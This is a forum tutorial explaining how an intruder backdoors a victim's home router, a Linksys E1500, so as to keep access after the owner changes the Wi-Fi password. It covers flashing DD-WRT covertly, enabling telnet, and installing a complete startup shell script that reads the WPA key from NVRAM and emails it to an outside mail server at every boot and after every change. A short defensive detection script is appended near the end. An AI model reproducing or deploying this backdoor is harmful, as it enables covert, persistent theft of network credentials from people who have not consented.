pomwtin

WAM

Jan 30th, 2016
[align=center][img]http://i.imgur.com/uGvtLk2.png[/img][/align]
[align=center][size=large][b]
WAM - Wireless access maintainer[/b][/size][/align]

[align=center][b][size=medium][color=#00BFFF]As many of you know, gaining access to a wireless network is sometimes not easy at all.[/color][/size][/b][/align]

[align=center]
Sure, if we can exploit WPS it is not so hard, but as you may have noticed fewer and fewer APs have WPS enabled and more APs have better WPS brute-force protection.
Basically this leaves us with the "classic" WPA/WPA2 vulnerability: the 4-way handshake.
Now imagine: all the time put into the effort, all the electricity bills caused by handshake cracking, everything just blown away by the AP owner changing the login credentials…
Not really a nice feeling, is it? [/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]What can we do in such a case? How can we prevent losing AP access?[/color][/size][/b][/align]

[align=center][b]Enabling remote control[/b] -> not going to help if the IP is not static or if the owner changes the router credentials
[b]Writing down the WPS PIN[/b] -> this usually helps, but it has happened too many times that the owner disabled it (ISP advice)
[b]Leaving a hidden guest network open[/b] -> easily noticeable[/align]

[align=center][b][size=medium][color=#00BFFF]There is another option… Why not backdoor the router?[/color][/size][/b][/align]

[align=center]There are a few ways to do this. Since most household routers (our main targets, I believe) have a very limited amount of memory, I'm going to present the method which uses the smallest amount of space and has proven reliable to me: not one network lost in a little less than a year (and there were some password changes)!
[b]Nice, isn't it?[/b][/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]The example will be shown on a Linksys E1500 router.[/color][/size][/b][/align]

[align=center][b]To avoid raising suspicion, perform the steps below when there is NO activity on the network![/b]

After a quick look at the control panel, we notice there is no telnet or SSH option to enable. This is bad, as we will need it.

There are workarounds:
A) Find more up-to-date official firmware and check if it has a telnet or SSH option
B) Check if the router is supported by DD-WRT or other aftermarket firmware projects (Tomato). They usually give you more control over your machine (check DD-WRT support [url=http://www.dd-wrt.com/site/support/router-database]HERE[/url]).

Here, we decide to take option B).
Why? I am not in the mood for checking official firmware for its options, and I know that DD-WRT (since they support this router) won't let me down.

We notice that the router (Linksys E1500) is supported by DD-WRT, as shown on the image below:[/align]

[align=center][img]http://shrani.si/f/2m/6H/3UF4RMGH/router-is-supported.png[/img][/align]

[align=center]
Now download your firmware. It should be something mentioning factory image -> DD-WRT image or first installation, as shown on the image below:[/align]

[align=center]
[img]http://shrani.si/f/1f/d3/2SvLVHgf/for1stinstallation.png[/img][/align]

[align=center][b]Before the firmware upgrade, save all network settings![/b] There should be no changes while upgrading the firmware, but just to be sure, copy / write down ALL network settings so you will be able to bring the network back up if needed.

Now find the firmware update window (administration -> firmware upgrade) and perform the upgrade:[/align]

[align=center][img]http://shrani.si/f/45/hn/483njVrB/update.png[/img][/align]

[align=center]In case of a power outage during the upgrade there is a chance of bricking the router!

After the firmware upgrade is completed the router [b]login credentials will change[/b]:
Username: root
Password: admin

Change them back to the original ones to avoid raising suspicion.

Some routers will delete the current wireless network and create a new open one called "dd-wrt".
After connecting back into the network, follow the steps below to set the network up as it was before:

[b]1[/b]) Check WAN access. If everything is OK then you do not have to make any changes in the connection settings. Otherwise set the same settings you saved in the previous step.
[b]2[/b]) Set the wireless settings to the same as before (ESSID, type of encryption, PSK) + set TX power to MAX :whistle:

By now you may have noticed that the GUI looks a bit different. Yes, this is the bad side of using third-party firmware. However, there is a workaround:

With tools like "firmware mod kit" and similar you can extract files from the firmware and modify them. BUT (yes, there is always a but…) the GUIs of most of the latest DD-WRT images are protected and therefore difficult to change, thanks to companies which decided to change the GUI and sell it as their own. As I said, this is difficult and requires different approaches for different firmware images, and that's why it won't be covered in this tutorial.

Back to the topic…

Now we need to enable SSH or telnet management, your choice.

Since SSH requires 2 changes in settings (1st enabling SSH, 2nd turning SSH on) we decide to go with telnet, which just needs to be turned on (administration -> management), as shown on the picture below:[/align]

[align=center][img]http://shrani.si/f/j/Tl/2m9PvBhB/telnet.png[/img][/align]
[align=center]

Also, if there is a JFFS/JFFS1/JFFS2 option to enable (administration -> management), then enable it, as shown on the picture below:[/align]

[align=center][img]http://shrani.si/f/3X/kG/4xOyg5kr/jffs.png[/img][/align]

[align=center]Clean JFFS2 is selected as we do not want it full; we need a few kB of space.
Select save and apply settings. The router may reboot and you will have to reconnect.
Now go back to the Clean JFFS2 setting and DISABLE it, then save and apply settings again. The router may reboot this time too. This gives us some free space.
It is not always necessary, but usually it has to be enabled for us to be able to continue our work.
I won't bother explaining what JFFS is (be honest, you are able to google it); you can read about it [url=https://en.wikipedia.org/wiki/JFFS]HERE[/url][/align]

[align=center][img]http://i.imgur.com/bkMAF1F.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]Congrats, the router is now ready for backdooring.[/color][/size][/b][/align]

[align=center]Before we continue let's assume that you know how a router works. Basically, we will be working with the router's NVRAM, where settings are saved.[/align]

[align=center][u][b]IMPORTANT[/b][/u]:
DD-WRT expects our script to have UNIX line endings. You can still write it under Windows, just be sure to save it right. Use a program like DOS2UNIX or MAC2UNIX, available [url=http://sourceforge.net/projects/dos2unix/]HERE[/url]

Or just use the right settings before saving, as shown in the example below:[/align]

[align=center][img]http://shrani.si/f/3w/UY/4uiIS84p/unix.png[/img][/align]

[align=center]
[b]If you ignore this, the router won't be able to execute it.[/b] [/align]

[align=center]Now power up a terminal.
[b]If you use Windows[/b] :omg: and have telnet disabled, enable it with: "dism /online /Enable-Feature /FeatureName:TelnetClient"

Connect to the router: "telnet 192.168.2.1" and log in with username "root" and the router's login password.
As shown on the picture below, the first thing we do is check if "sendmail" is included in the firmware.
Simply type the command "sendmail" and press enter. If you get no error output, then it is included.[/align]

[align=center][img]http://shrani.si/f/1S/FC/4brvnvMO/sendmail.png[/img][/align]

[align=center]If you get an error, then you have to install sendmail first:
0) find out which package manager you are dealing with, usually dpkg, ipkg or opkg
1) create jffs/tmp/Xpkg (where X is the correct character for the package manager)
2) run Xpkg update (where X is the correct character for the package manager)
3) run Xpkg install sendmail (where X is the correct character for the package manager)
4) If there are dependency errors, install the dependencies too

Now we have to find where in NVRAM the ESSID and PSK are saved. Use the command "nvram show | grep 'typeESSIDhere'" and the command "nvram show | grep 'typePSKhere'".
You will get output similar to this one:[/align]

[align=center]
[img]http://shrani.si/f/26/hC/3uKSLsOd/grepgrep.png[/img][/align]

[align=center]The ESSID and PSK are in more than one variable. We need to locate the one that changes directly after an ESSID and PSK change. After a few ESSID and PSK changes and the outputs shown below we locate such variables: in this example it is "wl0_ssid" for the ESSID and "wl0_wpa_psk" for the PSK. That is what we will use further in this tutorial.
If the router has 2.4 GHz and 5 GHz networks there will be 4 such variables instead of 2.

Now that we have the fundamental variable names for this job we still need to find an SMTP server. After each PSK change, the PSK and some details will be emailed to us: [b]that's our backdoor![/b] :thumbsup:

I suggest searching google for free SMTP servers. Basically you need to find the information shown on the picture below. There is an exception: if the SMTP server does not require authentication then you need only the server's address and port ([b]feel free to use the same SMTP server I am using[/b]).[/align]

[align=center][img]http://shrani.si/f/3e/2U/3uiN7jF4/smtp.png[/img][/align]

[align=center][b][size=medium][color=#00BFFF]Now let's take a look at our script…[/color][/size][/b][/align]

[align=center]Use, modify and integrate it as you wish, but it would be nice to give credit to the author :oui:

[b]The complete script is at the bottom of the page![/b]

Edit the following part to the needs of your SMTP server. Descriptions of the variables are in the script:[/align]

[php]# INTERVAL [seconds] - Check every INTERVAL if PSK was changed
INTERVAL=60
# MAIL_SERVER [address:port] - SMTP server in form smtp.example.com:26
MAIL_SERVER=mail.crackingservice.com:26
# MAIL_USER [username] - SMTP server username if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_USER=username
# MAIL_PASS [password] - SMTP server password if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_PASS=password
# MAIL_FROM [sender@domain.com] - Email address which will be shown as sender. WARNING: some SMTP servers do not allow spoofing, so use the right domain instead.
MAIL_FROM=gatherer@crackingservice.com
# DOMAIN_NAME [domain.com] - Domain of sender, SMTP server or recipient, not sure...
DOMAIN_NAME=crackingservice.com
# MAIL_TO [recipient@domain.com] - Email address to which collected data will be sent
MAIL_TO=gatherer@crackingservice.com
[/php]

[align=center]Now we will declare the function responsible for data gathering and email sending:[/align]

[php]# __sendmail - Function for data gathering and sending it via Email
# Current form: Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'
__sendmail(){
echo "$STARTUP" "From" $(date +%H.%M_%d.%m.%Y) "on, ESSID" "'"$(nvram get wl0_ssid)"'" "expects PSK" "'"$(nvram get wl0_wpa_psk)"'" | sendmail -S$MAIL_SERVER -f$MAIL_FROM -d$DOMAIN_NAME $MAIL_TO
}
[/php]

[align=center]Change [b]wl0_ssid[/b] and [b]wl0_wpa_psk[/b] to the variables you found before.
Leave the other parts alone and you will receive an email in the form "Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'". If you know what you are doing, feel free to modify it.[/align]

[align=center]The part below is responsible for sending us an email 30 seconds after router start-up. After that, it changes the "STARTUP" value, so we will know that the sending of the email was not triggered by router start-up:[/align]

[php]# Email current settings 30 [seconds] after router startup. Then change STARTUP value for further emails
sleep 30
STARTUP="Email was sent because of startup trigger!"
__sendmail
STARTUP="Email was not sent because of startup trigger!"
[/php]

[align=center]
Now we will save the current PSK, so we will be able to compare it with future PSKs and trigger email sending if they mismatch:[/align]

[php]# Remember current PSK as wpa_psk_old
nvram set wpa_psk_old=`nvram get wl0_wpa_psk`
nvram commit
[/php]

[align=center]And finally the last part: the main loop. Every "INTERVAL" seconds it checks if the old and current PSK mismatch, and if they do, the sending of an email is triggered and the current PSK is saved as the old PSK for further checking:[/align]

[php]# Infinite loop - commands above the while loop are executed only once
# Some APs do not reboot after PSK is changed. Loop below takes care of that.
# Every INTERVAL [seconds] check if PSK was changed
while sleep $INTERVAL
do
# Get current wpa PSK
wpa_psk_current=`nvram get wl0_wpa_psk`
wpa_psk_old=`nvram get wpa_psk_old`
# If current wpa PSK is not the same as wpa PSK saved as wpa_psk_old (quoted so a PSK containing spaces does not break the test)
if [ "$wpa_psk_current" != "$wpa_psk_old" ]; then
# Send new data to MAIL_TO email
__sendmail
# Set current wpa PSK as wpa_psk_old
nvram set wpa_psk_old="$wpa_psk_current"
nvram commit
fi
done[/php]

[align=center][b]Complete script:[/b][/align]

[php]#!/bin/sh
# WAM.startup
# WAM - wifi access maintainer will send AP PSK, ESSID and timestamp to email address MAIL_TO on every router startup and whenever PSK is changed.
# Script can not survive factory reset - for this it has to be integrated into router firmware image along with other changes (enable jffs, create directories)
# Script is created for and tested on dd-wrt firmwares
# NOTE: sendmail flags may vary with versions of installed busybox.
# SETUP: put WAM.startup into jffs/etc/config so it won't be deleted after router reboot.

# INTERVAL [seconds] - Check every INTERVAL if PSK was changed
INTERVAL=60
# MAIL_SERVER [address:port] - SMTP server in form smtp.example.com:26
MAIL_SERVER=mail.crackingservice.com:26
# MAIL_USER [username] - SMTP server username if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_USER=username
# MAIL_PASS [password] - SMTP server password if authentication is required - EDIT SENDMAIL COMMAND!
#MAIL_PASS=password
# MAIL_FROM [sender@domain.com] - Email address which will be shown as sender. WARNING: some SMTP servers do not allow spoofing, so use the right domain instead.
MAIL_FROM=gatherer@crackingservice.com
# DOMAIN_NAME [domain.com] - Domain of sender, SMTP server or recipient, not sure...
DOMAIN_NAME=crackingservice.com
# MAIL_TO [recipient@domain.com] - Email address to which collected data will be sent
MAIL_TO=gatherer@crackingservice.com

# __sendmail - Function for data gathering and sending it via Email
# Current form: Email was (not) sent because of startup trigger! From HH.MM_dd.mm.yyyy on, ESSID 'essid of AP' expects PSK 'psk of AP'
__sendmail(){
echo "$STARTUP" "From" $(date +%H.%M_%d.%m.%Y) "on, ESSID" "'"$(nvram get wl0_ssid)"'" "expects PSK" "'"$(nvram get wl0_wpa_psk)"'" | sendmail -S$MAIL_SERVER -f$MAIL_FROM -d$DOMAIN_NAME $MAIL_TO
}

# Email current settings 30 [seconds] after router startup. Then change STARTUP value for further emails
sleep 30
STARTUP="Email was sent because of startup trigger!"
__sendmail
STARTUP="Email was not sent because of startup trigger!"

# Remember current PSK as wpa_psk_old
nvram set wpa_psk_old=`nvram get wl0_wpa_psk`
nvram commit

# Infinite loop - commands above the while loop are executed only once
# Some APs do not reboot after PSK is changed. Loop below takes care of that.
# Every INTERVAL [seconds] check if PSK was changed
while sleep $INTERVAL
do
# Get current wpa PSK
wpa_psk_current=`nvram get wl0_wpa_psk`
wpa_psk_old=`nvram get wpa_psk_old`
# If current wpa PSK is not the same as wpa PSK saved as wpa_psk_old (quoted so a PSK containing spaces does not break the test)
if [ "$wpa_psk_current" != "$wpa_psk_old" ]; then
# Send new data to MAIL_TO email
__sendmail
# Set current wpa PSK as wpa_psk_old
nvram set wpa_psk_old="$wpa_psk_current"
nvram commit
fi
done

[/php]

[align=center]Or download it from [url=http://www.crackingservice.com/ddwrt_sendmail/WAM.startup]HERE[/url]

[b]THE SCRIPT HAS TO BE A .startup TYPE OF FILE[/b] (so it will be executed at router startup)[/align]

[align=center][b][size=medium][color=#00BFFF]Backdoor installation[/color][/size][/b][/align]

[align=center]Now all we have to do is:

1) Upload the script somewhere
2) create jffs/etc/config on the router (just avoid the temp folder as its content gets deleted)
3) wget the script to jffs/etc/config
4) make the script executable (chmod +x)
5) manually perform a test run
6) check if it works after the router reboots

You may notice that I am a bit lazy, and that's why I made a video regarding the last 6 steps… I am tired of writing and explaining this. :tongue:

To my big surprise, it appears that the video is [b]exactly[/b] the same length as Metallica - Nothing Else Matters… So enjoy it as background music :thumbsup:[/align]
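A defender-side check for the persistence described above, added here and not part of the original post or of DD-WRT: it scans a jffs/etc/config directory for *.startup scripts that read the WPA PSK from NVRAM and pipe it to sendmail, and checks a saved "nvram show" dump for the wpa_psk_old state variable the script leaves behind across reboots. The wam_* function names, the sample files and the paths are constructed for the demo.

```shell
#!/bin/sh
# Defender-side audit for the WAM-style persistence described above.
# Added example, not part of the original post or of DD-WRT.
# Assumes the layout the post describes: *.startup files under
# jffs/etc/config run at boot; paths, file contents and the wam_*
# function names below are constructed for this demo.

# wam_scan_file FILE: print "FILE: indicators" and return 0 on a hit,
# return 1 when the file shows none of the three indicators.
wam_scan_file() {
    f="$1"
    hits=""
    # reads the WPA PSK out of NVRAM (wl0_wpa_psk, wl1_wpa_psk, ...)
    grep -q 'nvram get [a-z0-9_]*wpa_psk' "$f" 2>/dev/null && hits="$hits psk-read"
    # pipes collected data into busybox sendmail
    grep -q '| *sendmail' "$f" 2>/dev/null && hits="$hits sendmail-pipe"
    # keeps the last-seen PSK in the script's own NVRAM variable
    grep -q 'wpa_psk_old' "$f" 2>/dev/null && hits="$hits state-var"
    [ -n "$hits" ] || return 1
    printf '%s:%s\n' "$f" "$hits"
}

# wam_audit_dir DIR: print one line per suspicious *.startup file in DIR.
wam_audit_dir() {
    for f in "$1"/*.startup; do
        [ -f "$f" ] || continue
        wam_scan_file "$f" || true
    done
}

# wam_audit_nvram DUMP: DUMP is saved 'nvram show' output; echo 1 if the
# script's wpa_psk_old variable is present (it survives reboots), else 0.
wam_audit_nvram() {
    if grep -q '^wpa_psk_old=' "$1" 2>/dev/null; then echo 1; else echo 0; fi
}

# wam_demo: build a constructed sample tree and echo "<hit files> <nvram flag>".
wam_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/jffs/etc/config"
    # constructed file shaped like the post's WAM.startup
    cat > "$d/jffs/etc/config/WAM.startup" <<'EOF'
#!/bin/sh
echo "$(nvram get wl0_ssid) $(nvram get wl0_wpa_psk)" | sendmail -Smail.example:26 gatherer@example
nvram set wpa_psk_old=`nvram get wl0_wpa_psk`
EOF
    # constructed benign startup script that must not be flagged
    printf '#!/bin/sh\nntpclient -h pool.ntp.org -s\n' > "$d/jffs/etc/config/ntp.startup"
    # constructed 'nvram show' dump containing the leftover state variable
    printf 'wl0_ssid=HomeNet\nwpa_psk_old=oldsecret\n' > "$d/nvram.txt"
    files=$(wam_audit_dir "$d/jffs/etc/config" | wc -l | tr -d ' ')
    nv=$(wam_audit_nvram "$d/nvram.txt")
    rm -rf "$d"
    echo "$files $nv"
}

wam_demo   # prints "1 1" for the constructed tree
```

On a real DD-WRT box the same functions are run as wam_audit_dir /jffs/etc/config and wam_audit_nvram on a file produced by "nvram show"; a hit on either is a reason to wipe the script, clear the variable and change the PSK.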

[align=center]
[video=youtube]https://www.youtube.com/watch?v=pOqVVEJ_zI8[/video][/align]


If there are any questions, feel free to ask :oui: